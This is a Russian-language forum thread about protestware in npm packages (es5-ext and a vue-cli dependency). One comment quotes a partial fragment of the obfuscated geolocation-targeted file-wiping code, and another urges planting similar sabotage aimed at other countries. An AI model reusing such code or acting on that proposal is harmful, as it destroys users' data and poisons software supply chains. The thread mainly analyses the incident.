Привет всем любителям открытого кода

Аватар пользователя vvelichko

Текст ниже прислали друзья. Еще раз передаю привет всем любителям открытых архитектур микропроцессоров! Ведь он такой открытый!

у коллег-фронтендеров стала падать сборка. Оказалось:

«
Коллеги, обращаем внимание, что  популярная библиотека https://www.npmjs.com/package/es5-ext которая не обновлялась до этого 2 года начала получать регулярные обновления которые содержат как негативную пропаганду, так и код по таймзоне увеличивающий утилизацию ресурсов
Смотреть файл - _postinstall.js
»

 

И сам тред с праведным гневом столкнувшихся с проблемой разработчиков из России:

https://github.com/medikoo/es5-ext/commit/28de285ed433b45113f01e4ce7c74e9a356b2af2

Так что опенсорс похоже «все» - собираешь какое-нибудь ядро Линукс, думаешь - там гуру, баги не пройдут, а у тебя уже код руткит на сборщике сделал и сетку доламывает))"

 

И в продолжение темы про open source, чтобы уже совсем закрыть тему на сегодня. В популярную библиотеку добавили вредоносный код, который направлен против пользователей в России и Беларуси и удаляет все файлы, до которых может добраться
https://github.com/vuejs/vue-cli/issues/7054

Авторство: 
Копия чужих материалов
Комментарий автора: 

Относительно опенсорца всё стало понятно 20 лет во время скандала с SCO. Неуправляемое стадо хомяков в лучших традиция жгет свои хаты, что б у соседа сарай сгорел.

Комментарии

Аватар пользователя Виктор Филимонов

Бесплатный сыр,,,,,,

Аватар пользователя просто пользователь

В УК РФ есть статья за написание вредоносного кода. Выяснить не сложно кто этот код написал. Останется только отловить и наказать. С большой вероятностью личность можно будет задержать в 404 при проверке документов.

Аватар пользователя vvelichko
vvelichko(12 лет 11 месяцев)
Аватар пользователя joho
joho(11 лет 1 месяц)

в конце концов, народа много, кто-нибудь да найдёт автора.

Соответственно, нужен стоплист из таких перцев. Если участвовал в правках - принимать после анализа/проверки

Аватар пользователя Vertel
Vertel(3 года 5 месяцев)

Под другим аккаунтом зайдет и продолжит гадить.

 

P.S. Всегда смешно было, как упоротые хабра-хомячки визжат про благословенный опенсорс, который спасет их от ненавистной слежки со стороны ненавистной России или со стороны благословенной США (которая, как известно, ни за кем не следит).

 

 

Аватар пользователя macmealan
macmealan(7 лет 6 месяцев)

Тем нельзя просто "гадить". У проекта есть, условно, ведущий или команда, который(ая) принимает решение о включении кода в основную ветку. Т.е. свои наработки может отправить кто угодно, но для того, что бы они попали в релиз (свежая версия) они должны быть проверены и приняты.

Аватар пользователя RedFox
RedFox(7 лет 10 месяцев)

Т.е. "ведущий или команда", это исключительно друзья России, и всякую гадость они не пропустят? Проверят, и отвергнут с негодованием?

Аватар пользователя macmealan
macmealan(7 лет 6 месяцев)

Разумеется нет. Я про то, что не важно с какого аккаунта ты будешь отправлять свой код в проект, со старого или с нового. То, что попадает в релиз, попадает туда с одобрения отвечающего за проверку присланного кода и сборку новой версии.

Аватар пользователя Aleks Братский
Aleks Братский(6 лет 10 месяцев)

Дык это не первый случай с Линуксом , ЕМНИП КивиБёрд писал про подобное (это только что помню).

Ну и не надо забывать что АНБ/ЦРУ тоже в курсе как использовать терморектальный криптоанализатор и вовсю им пользуются. (

Аватар пользователя RedFox
RedFox(7 лет 10 месяцев)

Это кагбе понятно. Что делать-то, если "отвечающий за проверку присланного кода и сборку новой версии" - русофоб? Ответ, ничего. А то, что среди этих "проверяющих" таких окажется много, это понятно.

Аватар пользователя boris-ronin
boris-ronin(4 года 10 месяцев)

Под названием шарага, отлавливать, судить, полгода на лесоповале, потом предложить исправить ущерб ударным программистским трудом. 

Аватар пользователя mr.quant
mr.quant(2 года 9 месяцев)

В УК РФ Статья 273 есть фраза "заведомо предназначенных для НЕСАНКЦИОНИРОВАННОГО"

Открытый код - открыт, ничего скрытого там нет. Читай и используй на свой страх и риск.

В общем теперь надо все обновления после 23.02 парсить на содержание ключевых слов и вообще надо развивать свою ветку линукс на территории РФ со своими репозиториями финансируемого госсударством.

 

Аватар пользователя joho
joho(11 лет 1 месяц)

Вредоносный код может быть зашифрован/обфусцирован

https://github.com/vuejs/vue-cli/issues/7054

Этот фрагмент кода

    const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
    o.get(n.toString("utf8"), function (t) {
        t.on("data", function (t) {
            const n = Buffer.from("Li8=", "base64");
            const o = Buffer.from("Li4v", "base64");
            const r = Buffer.from("Li4vLi4v", "base64");
            const f = Buffer.from("Lw==", "base64");
            const c = Buffer.from("Y291bnRyeV9uYW1l", "base64");
            const e = Buffer.from("cnVzc2lh", "base64");
            const i = Buffer.from("YmVsYXJ1cw==", "base64");
            try {

 

разворачивается в это

const n = "https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154";
  o.get(n.toString("utf8"), function (t) {
    t.on("data", function (t) {
    const n = "./";
    const o = "../";
    const r = "../../";
    const f = "/";
    const c = "country_name";
    const e = "russia";
    const i = "belarus";

 

в исходном тексте слова russia, belarus - не видны, поскольку обфусцированы.

Аватар пользователя vlkamov
vlkamov(12 лет 10 месяцев)

То есть на каком-то шаге он все же конвертируется в проверяемый.

Аватар пользователя joho
joho(11 лет 1 месяц)

нет.

раскрытие на этапе выполнения.

Аватар пользователя 2tvlad
2tvlad(6 лет 6 месяцев)

На такой код ругается, например, касперский. 

Что мешает его не обновлять, если такое встречается? 

Аватар пользователя joho
joho(11 лет 1 месяц)

скачайте, запустите попробуйте. Удалив, конечно строки с деструктивным поведением.

Заодно расскажите.

Что мешает его не обновлять, если такое встречается? 

Вы удивительный и невероятно проницательный человек, если можете видеть результат выполнения кода до его запуска. Предположу, что в индустрии разработчиков вам нет цены, поскольку способность предвидеть избавляет от необходимости отладки 

Там десятки (сотни) тысяч строк и сотни авторов кода.

Аватар пользователя 2tvlad
2tvlad(6 лет 6 месяцев)

Рассказываю. Сайт на joomla. Была неприятность и вирус. Пропустил через касперского. Получил и куски php кода подозрительные и прочие бекдоры. 

Все было зарезано. Сайт нормально, после этого работал. А там чего только не было, и голосовалка и рассылка и форум и ЛК. 

Аватар пользователя joho
joho(11 лет 1 месяц)

Бывают истории успешные. А бывают и нет.

Аватар пользователя 2tvlad
2tvlad(6 лет 6 месяцев)

Кто же спорит то? Но опять же, кто мешает установить на стенд обновления и пропустить через касперского? 

Аватар пользователя vlkamov
vlkamov(12 лет 10 месяцев)

> разворачивается в это
> const e = "russia";
> const i = "belarus"

- это уже исполняемый ?

Аватар пользователя joho
joho(11 лет 1 месяц)

Это результат деобфускации. Он выполняется при вызове функции.

В исходном коде этих строк в указанном виде нет.

Аватар пользователя vlkamov
vlkamov(12 лет 10 месяцев)

То есть деобфускация - проверка - компиляция.

Аватар пользователя joho
joho(11 лет 1 месяц)

Понимаете ли, обфускацию нашли люди. Пока не попали на проблему (код стирает файлы в ряде каталогов), не локализовали источник сбоя и не нашли вредоносный фрагмент.

Узнать, нет ли там вредоносных вставок, до запуска практически невозможно. Тем более, что проблема организована по геолокации по IP станции только в России и Беларуси. В прочих странах этот фрагмент не активен, и его просто никто не будет искать.

Этот код может быть использован в сотнях продуктов разных компаний, как фрагмент публичной библиотеки. В огромном числе случаев он будет вставлен автоматически, когда команда разработчиков решит взять более свежие версии библиотек, например - ожидая что в них будут исправлены ошибки, расширен функционал и устранены уязвимости. В каждом проекте таких библиотек сотни и более, и обновляются они на доверии.

У волка - тысяча дорог, у охотника только одна.

Единственный вариант, имхо - создание блэклиста разработчиков, вставляющих вредононсный код в публичные проекты. 

Я бы даже сказал больше, если у публичного кода есть авторы из ряда стран, то имеет смысл проводить расширенное тестирование, исходя из возможных конфликтов. Но это не является гарантией, сдуревший программёр может писать с Багам, иметь индийскую фамилию и стремиться нанести вред Новой Зеландии. Не угадаешь.

Аватар пользователя RedFox
RedFox(7 лет 10 месяцев)

Единственный вариант, это вставлять такие же куски кода, только с геолокациями "USA", "GB", "Ukraine" и т.п. Чтобы прилетало всем и весь этот бардак с якобы бесплатным и непроприетарным ПО был похоронен в умах как можно скорее.

Не может быть в конкурирующих экономических зонах никакого "свободного" ПО, и уж тем более из другой зоны. Потому что оно тоже будет оружием, и как бы и не сравнимой с "Калибрами" и "Томагавками" мощности.

Аватар пользователя mumpster
mumpster(5 лет 11 месяцев)

у вас бред написан.

ибо тут всё просто - код ходит на указанный в комменте URL 9в base64 именно он:

 

 base64 -d
aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=
https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a53091... 
 

и получает данные о посетителе через JSON

 

т.е. просто надо проверять какое амно ты себе ставишь прежде чем его в прод пускать.

 

причём существа развлекались этим и раньше - попадались "весёлые" rpm где на iаге install выполнялся "пач Бармина".

Аватар пользователя Arioch
Arioch(4 года 2 месяца)

...сижу, никого не трогаю, обновляю драйвера GeForce :)

Аватар пользователя medex81
medex81(3 года 1 месяц)

Пожалуй стоит нашкорябать статью на хабре по этому поводу, теперь пусть на виртуалке проверяют каждую обнову которую тянут.

Аватар пользователя NoZZy
NoZZy(10 лет 5 месяцев)

всё там есть, только они в иной кодировке.  но это довольно легко исправить поисками по base64  а если надо на поток - то можно сделать поисковик по популярным кодировкам.

ну и в довесок - используйте стронние системы защиты и не торопитесь обновляться.   я до сих пор на вин7  сижу с убитыми обновлялками , всё работает только браузеры  иногда приходится обновлять..Тут   правило простое качаешь свежак , полную установку, а не 1 мб обновляльщик (приходится поискать)  откладываешь на месяц  через месяц читаешь отзывы форумы о проблемах и или устанавливаешь или стираешь

Аватар пользователя Alexandr_Kot
Alexandr_Kot(5 лет 3 месяца)

он уже проверяемый , просто кодировка басе64
обфускация это другое

Аватар пользователя mr.quant
mr.quant(2 года 9 месяцев)

Ну это само собой. На войне как на войне, будет не просто.

Аватар пользователя qwweer
qwweer(9 лет 3 месяца)

Ни один нормальный ментейнер такой подозрительный пулл реквест не заапрувит не проверив что же там под этим base64. То что такой код попал в продакшн означает, что ментейнер библиотеки в деле. 

Аватар пользователя joho
joho(11 лет 1 месяц)

я же говорю - всё работает на доверии. Вы пользуетесь библиотекой, доверяете её мейнтейнеру. А то, что он ненавидит пингвинов в Антарктиде, узнаете когда у вас в путешествии продукты внезапно  стухнут.

А до того всё будет мягким, пушистым и шелковистым.

А base64 может собираться из кусков и иметь фрагменты под замену перед декодированием. Так что не всё так прямолинейно 

Аватар пользователя qwweer
qwweer(9 лет 3 месяца)

Ну, я не знаю как там принято у джаваскриптеров, но я в принципе не пропущу пуллреквест если непонятно, что он делает. Иначе какой смысл в этой проверке? Конечно, даже при таком строгом подходе можно подсунуть какую-либо каку, но это сделать куда сложнее, особенно если нужен не просто рандомный баг, а конкретное сложное поведение. 

Аватар пользователя monk
monk(12 лет 9 месяцев)

Вот в ядро успешно втыкали: https://www.linux.org.ru/news/kernel/16279331

И в результате "было принято решение больше никогда не принимать патчи от людей из этого заведения.". То есть, фактически, признали, что нормальную проверку патчей сделать нельзя.

Аватар пользователя qwweer
qwweer(9 лет 3 месяца)

Лор всегда был желтоват, мягко говоря. На опеннете лучше история изложена. И, да:

Дополнение 4: Исследователи раскрыли информацию о патчах с уязвимостями. В августе 2020 года в ходе эксперимента было отправлено пять патчей: два корректных и три включающих скрытые ошибки, создающие условия для возникновения уязвимостей. Все из проблемных патчей сразу были отвергнуты по инициативе мэйнтейнеров, ни один из патчей не был одобрен.

Не то, чтобы это было невозможно в принципе, но именно в ядре Линукса один из самых хорошо организованных процессов разработки, так что туда такое протолкнуть сложнее, чем в какую-нибудь ноунэйм библиотеку.

Аватар пользователя mumpster
mumpster(5 лет 11 месяцев)

+100500

Аватар пользователя jawa
jawa(8 лет 1 месяц)

в исходном тексте слова russia, belarus - не видны, поскольку обфусцированы.

немного не тот термин.

Обсфукация кода - это трудночитаемость, когда перед компиляцией его автозаменой превращают из

"ПеременнаяСНормальнымИменем" в "100500подчеркиванийТрампарамБелиберда".

Это для того чтобы тот кто попробует декомпилировать изматерился.

 

А это просто кодирование base64, которое позволяет превратить любой бинарный файл в текст.

Можете ТоталКоммандером расшифровать эту строку.

Аватар пользователя Pol
Pol(9 лет 10 месяцев)

Android тоже, кстати, open source. Эта статья позволяет смотреть широко, в частноcти, любителям ставить обновления на телефоны, PC...

Не устанем пыль глотать, привлекать по нашему УК – Google, Microsoft... Не?

Аватар пользователя gridd
gridd(8 лет 5 месяцев)

Делайте свой гитхаб, с преферансом и курсистками.

Аватар пользователя Турист
Аватар пользователя macmealan
macmealan(7 лет 6 месяцев)

Молодцы, вот только кто туда загонит разработчиков со всего мира? А github - это именно про коллективную работу авторов всего мира. И opensource именно про это.
Так-то такой "аналог" может любой человек поднять хоть в интернете, хоть у себя в локальной сети на основе бесплатного git. Да интерфейс сначала будет попроще, но лиха беда начала.

Аватар пользователя RedFox
RedFox(7 лет 10 месяцев)

А вам обязательно нужны гадящие вам "разработчики со всего мира"? Мало дерьма в реале оттуда льется, давайте еще в информатике его жрать добровольно?

Аватар пользователя macmealan
macmealan(7 лет 6 месяцев)

Да, мне обязательно нужны "разработчики со всего мира". Потому что именно благодаря "разработчикам со всего мира" вы сейчас тут пишете чушь. Если бы не "разработчики со всего мира", то не известно появился бы вообще этот сайт в том виде в каком он существует. Потому что, вы не поверите, он работает не на отечественном ПО, а на ПО разработанном "разработчиками со всего мира". Даже редактор текста, которым мы тут с вами пользуемся - это результат работы "разработчиков со всего мира" https://github.com/ckeditor/ckeditor5
Вы вообще не представляете, видимо, степень взаимопроникновения стран в мире IT.

А вот как отсеивать гадящих от негадящих  - это проблема.

Аватар пользователя joho
joho(11 лет 1 месяц)

А вот как отсеивать гадящих от негадящих  - это проблема.

Ну это известная проблема

Читал, в америке настроили нейронную сетку, что бы она подсказывала полицейским, кто имеет большую склонность к правонарушениям.

Внезапно оказалось, что сетка выбирала, в основном, негров. Пришлось программистам дополнительные штрафные баллы на белых вешать, что бы избежать обвинения в расизме

Аватар пользователя Kozel de Baran
Kozel de Baran(5 лет 10 месяцев)

Это просто дорого и хлопотно. Ибо есть гадящие, есть маньяки, есть банальные ошибки. И все эти ошибки и целенаправленные изменения в коде надо вылавливать.

С этой точки зрения ошибка архитектора некоей программы куда более трудно обнаружима и без полного переписывания всего проекта может оказаться неустранимой.

Аватар пользователя RedFox
RedFox(7 лет 10 месяцев)

Чушь пишете вы. Потому что много пафоса в первом абзаце, а последним предложением вы весь этот пафос обнулили и перечеркнули все ваши сентенции.

Потому что не будет больше никаких "разработчиков со всего мира". С этими розовыми соплями, что в интернете, видите ли, нет границ, (давно было) пора заканчивать. Границы и были, и есть, и тем более будут. Нет никакой гарантии, да что там, наоборот, есть гарантии, что все "разработчики со всего мира" будут под плотным "колпаком у Мюллера", хоть якобы "опенсорс" они там пилят, хоть проприетарщину. И будут ОБЯЗАНЫ встраивать в код закладки против "недружественных" государств. Точно так же, как всё высокотехнологичное оружие обязано быть снабжено системами различения "свой/чужой", в том числе и скрытыми, чтобы его в принципе нельзя было использовать против той страны, которая его разработала. Я совсем не эксперт в оружии, но если в нем таких систем и закладок нет... Ну это, мягко говоря, просто странно было бы и очень надеюсь, что такого не допускают.

Вы вообще не представляете, видимо, степень взаимопроникновения стран в мире IT.

Придется "окончательно размежеваться", как говорил В.И.Ленин...

Аватар пользователя Кабан
Кабан(12 лет 3 месяца)

Новость хорошая. Особенно вот это "порадовало": "Для дополнительной защиты аккаунта можно подключить 2FA  авторизацию от Google."

А прикручивать то надо было авторизацию "от госуслуг" :).

Аватар пользователя Турист
Турист(10 лет 3 месяца)

-- Это было создано пару лет назад. Сейчас наверняка поменяют...

Аватар пользователя Кабан
Кабан(12 лет 3 месяца)

Пару лет назад создали? А завершили бета-тестирование в прошлом декабре? Вот это я понимаю - люди никуда не торопятся. Лет через триста допилят основной функционал?

Страницы